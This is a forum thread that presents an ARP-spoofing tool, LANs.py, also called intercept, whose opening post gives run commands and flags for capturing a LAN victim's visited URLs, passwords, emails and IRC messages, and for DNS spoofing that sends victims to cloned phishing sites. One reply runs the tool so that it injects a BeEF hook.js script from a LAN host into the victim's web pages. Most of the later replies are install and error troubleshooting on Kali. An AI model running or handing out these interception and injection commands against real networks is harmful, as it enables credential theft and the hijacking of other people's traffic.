This is an open source python tool for seeing all interesting traffic from and to a client on your LAN. It's an asynchonous, multithreaded arp spoofing packet parser. It uses the Twisted framework, iptables nfqueue to feed the callback functions packets, and scapy for most packet dissection and injection.

Simple usage:

git clone https://github.com/DanMcInerney/intercept
cd intercept/
python intercept.py -u -p -n

http://i.imgur.com/Qlo7EoI.png

http://i.imgur.com/kQofTYP.png

-u: URLs visited; truncates at 150 characters and filters image urls since they spam the output
-p: display username/passwords for FTP/IMAP/POP/IRC/HTTP, POSTs made, all searches made, and incoming/outgoing email and IRC messages sent
-n: perform an doutput a very quick nmap scan of the target for open ports and operating system info

Full usage:

python intercept.py -u -p -n -na -dns neopets.com -set -d -ip 10.0.1.20

http://i.imgur.com/PwzUYcY.png

-na: perform an aggressive and complete nmap scan of the victim in the background including service enumeration. Saves results to <IP address>.nmap.txt in the working directory
-dns DOMAIN: drop packets to DOMAIN and inject our own pointing the victim to the attack's IP address. This is especially powerful when combined with SET's web site cloning tool (option 1, 2, 3, 2, then enter the domain you're spoofing).
-set: open the social engineer's toolkit

Prereqs: Linux, scapy, python nfqueue-bindings, aircrack-ng, python twisted

Tested on Kali 1.0. Please PM or reply with bug reports.

wow !!! great tool !!

hi :)
thanks for share!!!
i watch the ""tutorial"" posting -up

root@kali:~# git clone https://github.com/DanMcInerney/intercept
Cloning into 'intercept'...
remote: Counting objects: 306, done.
remote: Compressing objects: 100% (206/206), done.
remote: Total 306 (delta 105), reused 296 (delta 98)
Receiving objects: 100% (306/306), 83.65 KiB, done.
Resolving deltas: 100% (105/105), done.

root@kali:~# cd intercept/
root@kali:~/intercept# ls
LANs.py README.md

root@kali:~/intercept# python LANs.py
[-] python-nfqueue not installed, would you like to install now? (apt-get install -y python-nfqueue will be run if yes) [y/n]: y
Traceback (most recent call last):
File "LANs.py", line 31, in <module>
os.system('apt-get install -y python-nfqueue')
NameError: name 'os' is not defined

root@kali:~/intercept# apt-get install -y python-nfqueue
Lettura elenco dei pacchetti... Fatto
Generazione albero delle dipendenze
Lettura informazioni sullo stato... Fatto
I seguenti pacchetti saranno inoltre installati:
libnetfilter-queue1
I seguenti pacchetti NUOVI saranno installati:
libnetfilter-queue1 python-nfqueue
0 aggiornati, 2 installati, 0 da rimuovere e 7 non aggiornati.
È necessario scaricare 59,0 kB di archivi.
Dopo quest'operazione, verranno occupati 261 kB di spazio su disco.
Scaricamento di:1 http://http.kali.org/kali/ kali/main libnetfilter-queue1 i386 0.0.17-1 [7762 B]
Scaricamento di:2 http://http.kali.org/kali/ kali/main python-nfqueue i386 0.4-3 [51,2 kB]
Recuperati 59,0 kB in 1s (56,3 kB/s)
Selezionato il pacchetto libnetfilter-queue1 non precedentemente selezionato.
(Lettura del database... 329012 file e directory attualmente installati.)
Estrazione di libnetfilter-queue1 (da .../libnetfilter-queue1_0.0.17-1_i386.deb)...
Selezionato il pacchetto python-nfqueue non precedentemente selezionato.
Estrazione di python-nfqueue (da .../python-nfqueue_0.4-3_i386.deb)...
Configurazione di libnetfilter-queue1 (0.0.17-1)...
Configurazione di python-nfqueue (0.4-3)...

root@kali:~/intercept# python LANs.py
[-] Wired interface found as default route, please connect wirelessly and retry or specify the active interface with the -i [interface] option. See active interfaces with [ip addr] or [ifconfig].


one questions: worked only on wireless iface or i can use(partly) my eth0-active-connection?

thanks in advance:)

I need to put LANs.py instead of intercept.py

Nice script flyingtriangle. When i run it with beef using

python LANs.py -u -p -n -ip 192.168.0.6 -b http://192.168.0.9:3000/hook.js

goes fine until:

[+] Nmap done: 1 IP address (1 host up) scanned in 30.44 seconds


www.independent.co.uk/news/uk/home-news/st-andrews-day-google-doodle-marks-scotlands-national-day-with-fluttering-saltires-8974102.html
callback failure !
Traceback (most recent call last):
File "LANs.py", line 169, in start
self.injecthtml(load, ack, pkt, payload, dport, sport)
File "LANs.py", line 239, in injecthtml
debugger = open('/home/user/projects/origBody', 'w')
IOError: [Errno 2] No such file or directory: '/home/user/projects/origBody'
callback failure !
Traceback (most recent call last):
File "LANs.py", line 169, in start
self.injecthtml(load, ack, pkt, payload, dport, sport)
File "LANs.py", line 239, in injecthtml
debugger = open('/home/user/projects/origBody', 'w')
IOError: [Errno 2] No such file or directory: '/home/user/projects/origBody'
callback failure !
Traceback (most recent call last):
File "LANs.py", line 169, in start
self.injecthtml(load, ack, pkt, payload, dport, sport)
File "LANs.py", line 239, in injecthtml
debugger = open('/home/user/projects/origBody', 'w')

:D

Nice script flyingtriangle. When i run it with beef using

python LANs.py -u -p -n -ip 192.168.0.6 -b http://192.168.0.9:3000/hook.js

goes fine until:

[+] Nmap done: 1 IP address (1 host up) scanned in 30.44 seconds


www.independent.co.uk/news/uk/home-news/st-andrews-day-google-doodle-marks-scotlands-national-day-with-fluttering-saltires-8974102.html
callback failure !
Traceback (most recent call last):
File "LANs.py", line 169, in start
self.injecthtml(load, ack, pkt, payload, dport, sport)
File "LANs.py", line 239, in injecthtml
debugger = open('/home/user/projects/origBody', 'w')
IOError: [Errno 2] No such file or directory: '/home/user/projects/origBody'
callback failure !
Traceback (most recent call last):
File "LANs.py", line 169, in start
self.injecthtml(load, ack, pkt, payload, dport, sport)
File "LANs.py", line 239, in injecthtml
debugger = open('/home/user/projects/origBody', 'w')
IOError: [Errno 2] No such file or directory: '/home/user/projects/origBody'
callback failure !
Traceback (most recent call last):
File "LANs.py", line 169, in start
self.injecthtml(load, ack, pkt, payload, dport, sport)
File "LANs.py", line 239, in injecthtml
debugger = open('/home/user/projects/origBody', 'w')

:D

So I've done some updates. Can you please tell me if it's working now?

So I've done some updates. Can you please tell me if it's working now?

Came up from a new install of Kali, just about 3 hours ago and when using beef, it still gives me the same error

Came up from a new install of Kali, just about 3 hours ago and when using beef, it still gives me the same error

Whoops, that was a silly bug I uploaded. Fixed it.

Is there a way to scan the whole network?

We keep getting an error when trying to install the below which is called up by the program

apt-get install -y python-nfqueue



Any help in finding this. We are using kali sources.list and we have truied others

Further to our above we are unable to load apt-get install -y python-nfqueue on our updated and upgraded kali1.05 hardrive installs(three computers). However it loads on all our persistent usb installs of kali1.05.

I had the same issue, I then modified the sources.list to as below and able to install python-nfqueue

deb http://http.kali.org/kali kali main non-free contrib
deb-src http://http.kali.org/kali kali main non-free contrib

deb http://http.kali.org/kali kali-dev main contrib non-free
deb-src http://http.kali.org/kali kali-dev main contrib non-free

deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

"This is one of Vulpi's post on Kali"

I am getting an error
root@kali:~/intercept# python LANs.py -u -p -n
Running ARP scan to identify users on the network; this may take a minute - [nmap -sn -n 192.168.239.0/24]
[-] Router MAC not found. Exiting.

What am I doing wrong? My adapter is in mono mode and I have connected to my network via wlan0

It would appear I have found the solution to some extent - I had been running reaver prior to running this script and had
killed some of the services - after a reboot the script ran but although I am connected to my own network via a VM it does not
show my computer name after the scan - all I get is three ip's one of which is the router with nothing else showing for the other
3 ip's, is this normal?

Rab.